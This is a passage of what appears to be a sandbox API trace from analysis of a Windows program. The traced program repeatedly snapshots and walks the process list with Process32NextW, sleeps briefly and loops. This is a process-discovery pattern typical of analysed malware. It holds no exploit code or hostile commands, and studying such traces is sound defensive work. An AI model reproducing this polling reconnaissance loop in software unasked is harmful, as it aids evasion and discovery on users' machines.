pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.084] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.085] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0125.086] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.087] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.088] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0125.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0125.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0125.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0125.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0125.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0125.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0125.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0125.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0125.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0125.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0125.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0125.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0125.660] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0125.661] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0125.663] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0125.664] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0125.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0125.667] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0125.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0125.673] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0125.675] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0125.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0125.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0125.679] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0125.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0125.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.683] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0125.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0125.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0125.687] CloseHandle (hObject=0xbc) returned 1 [0125.687] Sleep (dwMilliseconds=0x12c) [0126.689] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0126.695] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0126.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0126.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0126.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0126.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0126.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0126.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0126.704] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.707] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.708] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0126.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.710] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.711] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0126.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.714] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0126.715] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0126.717] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0126.718] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0126.720] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.721] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0126.723] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0126.724] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0126.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0126.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0126.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0126.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0126.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0126.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0126.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0126.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0126.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0126.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0126.780] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0126.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0126.783] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0126.784] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0126.785] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0126.786] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0126.788] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 